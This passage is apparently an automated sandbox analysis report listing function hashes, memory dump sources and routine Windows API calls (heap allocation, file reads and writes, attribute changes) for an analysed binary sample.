                                                                                                                                                                      • Instruction ID: b56f4381aa9f4b69fa0f3d3a9db7a26a43547608d30693ed12c7faf5933e70ef
                                                                                                                                                                      • Opcode Fuzzy Hash: dd2d5af46e462a8c14ae85c085df6146a90b8f192a789a8dbbf997dae1be6a27
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E018F32601210DFD7748B16DF0DA677769FB40761B5512BAE905AB6F0C3B8DC41CBA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A552
                                                                                                                                                                        • Part of subcall function 00417A3F: RaiseException.KERNEL32(?,?,?,0041A574,?,?,?,?,?,?,?,?,0041A574,0040126C,0042DD94,0040126C), ref: 00417A9F
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041A56F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3476068407-0
                                                                                                                                                                      • Opcode ID: fe1100fb1d7b6b347577254c2234f5f819bd5562f06c4e9abbd01681d22f0dc0
                                                                                                                                                                      • Instruction ID: d12a38eab4a7d80f37061d8899ca6cec70c8026c2add7983b7367f04d469bf92
                                                                                                                                                                      • Opcode Fuzzy Hash: fe1100fb1d7b6b347577254c2234f5f819bd5562f06c4e9abbd01681d22f0dc0
                                                                                                                                                                      • Instruction Fuzzy Hash: 02F0907191420DB68B00BAAAE8169DE777C5E00368B60422BF92491591EF78AFD981CE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                      • Opcode ID: 8ffefae7a48324e20509260429bcb6285bdb87c0c19b30ac424f9fa377c60f5f
                                                                                                                                                                      • Instruction ID: 62856e42b178e2150d632fdb3f09d90d84e8e42d3cfa801e0cf712be60b087ee
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ffefae7a48324e20509260429bcb6285bdb87c0c19b30ac424f9fa377c60f5f
                                                                                                                                                                      • Instruction Fuzzy Hash: 52E0E5F36C16259197212B3B7C423EB1242AB81336F15933BF838861D0DF6C48C3509E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00410358
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 00410365
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: ebcb7c770871866fc2c778f231c86ac780216e10cca07bbd22bda75aaee00768
                                                                                                                                                                      • Instruction ID: a70b658f7993ab1dd551acf62be76483812062c6ef9775d85c181ca53b5394e7
                                                                                                                                                                      • Opcode Fuzzy Hash: ebcb7c770871866fc2c778f231c86ac780216e10cca07bbd22bda75aaee00768
                                                                                                                                                                      • Instruction Fuzzy Hash: CCF0BE71500108EFCF00CF68D800ADF7BE8EF09310B0082A6F826872A0D231DD51EBA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000010), ref: 00407D70
                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00407D82
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallbackDispatcherMetricsSystemUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 365337688-0
                                                                                                                                                                      • Opcode ID: d68bab5cad2fd5c6a9f0c40b32ae04f71d22314e868a1fc9636977f6dfc9f790
                                                                                                                                                                      • Instruction ID: 8a2af6db6d6699d1174237191ec47cc7190e70ffd72affa2b2cbbbcad6802088
                                                                                                                                                                      • Opcode Fuzzy Hash: d68bab5cad2fd5c6a9f0c40b32ae04f71d22314e868a1fc9636977f6dfc9f790
                                                                                                                                                                      • Instruction Fuzzy Hash: B0F01DB0A40A03AFC394CF39A904694BBF1BB48301785963B9515C2AA4EBB4A4A58F44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                      • Opcode ID: ab05df357e0723b355b7833e2634267bcf3e6fe20f44ee2a5d24befaf159fe2e
                                                                                                                                                                      • Instruction ID: 2042bf80dc885ba3fea59f476377a160e6094a6bfacbedfde31517aa709a3101
                                                                                                                                                                      • Opcode Fuzzy Hash: ab05df357e0723b355b7833e2634267bcf3e6fe20f44ee2a5d24befaf159fe2e
                                                                                                                                                                      • Instruction Fuzzy Hash: 49122A71A00209DFCB14DFA9C884AAEB7B5FF48314F24416AE915BB391DB35AD41CF98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0040CAE7
                                                                                                                                                                        • Part of subcall function 0040DC53: __EH_prolog.LIBCMT ref: 0040DC58
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                      • Opcode ID: 2018f6b1d902506908b98274f57975154d314320d2fd72fe4728942dd41f55c0
                                                                                                                                                                      • Instruction ID: 6a90f4cc4477ba0de7b0b2d7aa1b4239724ca88eab9eb8f697e0ae6dfce5eb16
                                                                                                                                                                      • Opcode Fuzzy Hash: 2018f6b1d902506908b98274f57975154d314320d2fd72fe4728942dd41f55c0
                                                                                                                                                                      • Instruction Fuzzy Hash: D0417C30A0161AEFCB11DF64D885F9EB7B8BF04704F04426EE909AB251DB74ED14CB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041D93D: RtlAllocateHeap.NTDLL(00000008,0040126C,00000000,?,0041D6D7,00000001,00000364,00000006,000000FF,?,0041D0A8,0041E0CF,?,?,004199EC,?), ref: 0041D97E
                                                                                                                                                                      • _free.LIBCMT ref: 00420169
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                      • Opcode ID: b7413877cbfda83a37a5655c88cf64e534879104b46e028407b95268035cc8d8
                                                                                                                                                                      • Instruction ID: 347512d04ea8cf8b102ab265504e97e183816f1b29ec93fbfd028074a81d6a8b
                                                                                                                                                                      • Opcode Fuzzy Hash: b7413877cbfda83a37a5655c88cf64e534879104b46e028407b95268035cc8d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 8501DBB26003056BE7218F659C419ABFBD9EB85370F65061EE59443281EA356846C768
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,0040126C,00000000,?,0041D6D7,00000001,00000364,00000006,000000FF,?,0041D0A8,0041E0CF,?,?,004199EC,?), ref: 0041D97E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 14049bf4b6ce20fb27755c2a3cfca8c8397d8d5df8b727a9b2ec2e394b38be47
                                                                                                                                                                      • Instruction ID: 3067135e7c69b4be9f77b1917f755836a33887343b27f4dba89ff31a94ad5086
                                                                                                                                                                      • Opcode Fuzzy Hash: 14049bf4b6ce20fb27755c2a3cfca8c8397d8d5df8b727a9b2ec2e394b38be47
                                                                                                                                                                      • Instruction Fuzzy Hash: E9F0B4F1E6412466DB212A229C01BDB7B58AF417A0F154137EC08A7284CB6CD8818BED
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00411B8A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8Throw
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2005118841-0
                                                                                                                                                                      • Opcode ID: da7a567b2c4ebb543e83a60b31ab2182afb3451ea047a6d48001e17bb0bb83cb
                                                                                                                                                                      • Instruction ID: 1d800cffeec876e8cd722c029b7a6b9fe31125f89d117b03b29b7471883dbba7
                                                                                                                                                                      • Opcode Fuzzy Hash: da7a567b2c4ebb543e83a60b31ab2182afb3451ea047a6d48001e17bb0bb83cb
                                                                                                                                                                      • Instruction Fuzzy Hash: E1F089732042146FCB149F79F841A9ABBDDDF843A4B10843FF605CB151D6759D8486D8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFileAttributesW.KERNELBASE(?,?), ref: 004032A8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 66491aa15b8e74441fa2ad416c14f8400e159aa47d2853598fc1d695cb1a9bb1
                                                                                                                                                                      • Instruction ID: 3423d9424ec2976be9e076b0f6e94355165e6366949a5792af5c8323679cc572
                                                                                                                                                                      • Opcode Fuzzy Hash: 66491aa15b8e74441fa2ad416c14f8400e159aa47d2853598fc1d695cb1a9bb1
                                                                                                                                                                      • Instruction Fuzzy Hash: EDF049312007049BDB24DFA5C848B57B7E8BF08306F00096EE88796AA0D378F985CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,004199EC,?,?,00411598,00000008,?,00407D46,?,00401253,?,0040126C), ref: 0041E0BE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 9a4d0b83301378004569861e310aaa3669c1eb82f0853e4a94a4f7517ef152d2
                                                                                                                                                                      • Instruction ID: cbc843ab043aea12efb8ddee3cde40103f8360b619b64b341e0691f6cf6bce25
                                                                                                                                                                      • Opcode Fuzzy Hash: 9a4d0b83301378004569861e310aaa3669c1eb82f0853e4a94a4f7517ef152d2
                                                                                                                                                                      • Instruction Fuzzy Hash: FFE0653964513056D63126675C007DB7E99BF593A1F150167ED06972D0CBEDCCC182EE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetEnvironmentVariableW.KERNELBASE(?,?,?), ref: 0040635F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1431749950-0
                                                                                                                                                                      • Opcode ID: 4a2952c0456dfef48979a76774a499fc477fe4a47e00bca47060e5fd2ea007e1
                                                                                                                                                                      • Instruction ID: 97ec60d6e2c6dfbd8c7d7ad9b2a313eec0e9fc7f3b01a66e54958d82308bc047
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a2952c0456dfef48979a76774a499fc477fe4a47e00bca47060e5fd2ea007e1
                                                                                                                                                                      • Instruction Fuzzy Hash: 45F01231900028AFCB20EBE8EC55CCDB7B8EB04304711017AF951B71B6DB74E955CB89
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004101C5: CloseHandle.KERNEL32(?,?,004101EF,?,?,00410297,?,80000000,?,?,?,?,004102ED,?,?,00000003), ref: 004101CF
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,?,00410297,?,80000000,?,?,?), ref: 00410206
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3498533004-0
                                                                                                                                                                      • Opcode ID: 4eeb18e75329cfa150246b9a7246517bfeef60539e57579f099338917d1b6df1
                                                                                                                                                                      • Instruction ID: 889f0cad0a8d0e25c71668c3901d8d23152b3c672e7c7509d8dd264a348a0d7f
                                                                                                                                                                      • Opcode Fuzzy Hash: 4eeb18e75329cfa150246b9a7246517bfeef60539e57579f099338917d1b6df1
                                                                                                                                                                      • Instruction Fuzzy Hash: FDE08C32000219BBCF211FA49C02BCA3B2AAF04360F104116FA14551E1C7B6D8F0AB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,00000001,00000001,00000000,?,00410445,?,00000001,00000000,?,?,00000000,?,?,004107ED), ref: 0041048B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: 8a2e6c0334bc89f23ba97bcf6f1b71ff15e7377b0494ce4e358ccbed341504c3
                                                                                                                                                                      • Instruction ID: ee1ce227f3de7638b596e8d67e90bca51049101c08e26ea773461c5066e1ff3e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a2e6c0334bc89f23ba97bcf6f1b71ff15e7377b0494ce4e358ccbed341504c3
                                                                                                                                                                      • Instruction Fuzzy Hash: D7E0E532200209EFDB00CF10D841FAA37AAFB88714F10C128E9188A210D331AA20DF58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00410307
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: 43f30ffb6e12e3d8ca92a7d410084cb5a86d7931581929057c4e3ca2e383e352
                                                                                                                                                                      • Instruction ID: a00d19791c8a15e731787cbb0f0cb061f2b007acdb45f2ba025ad1f5564b8e6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 43f30ffb6e12e3d8ca92a7d410084cb5a86d7931581929057c4e3ca2e383e352
                                                                                                                                                                      • Instruction Fuzzy Hash: 18E0EC36200208FFDB01CF90CC01FDE7BB9EB05314F518068A90596250C775AA64EB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3519838083-0
                                                                                                                                                                      • Opcode ID: ced5567f4758389d7df3c0023eee75abb33bc1cedd73c2ffa7038f3a13f2c471
                                                                                                                                                                      • Instruction ID: dbf068bb6c6f98a1f29eed7e317dfe09a5148866e4f0c403f86f4991b60a5af1
                                                                                                                                                                      • Opcode Fuzzy Hash: ced5567f4758389d7df3c0023eee75abb33bc1cedd73c2ffa7038f3a13f2c471
                                                                                                                                                                      • Instruction Fuzzy Hash: 80D01772801119BBDF019F81CC02EDF7B39EF09758F04440AF90022110C7B9AE209BA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?,?,004103FB,00000000,00000000,?,?,0040328B,?), ref: 0041040D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
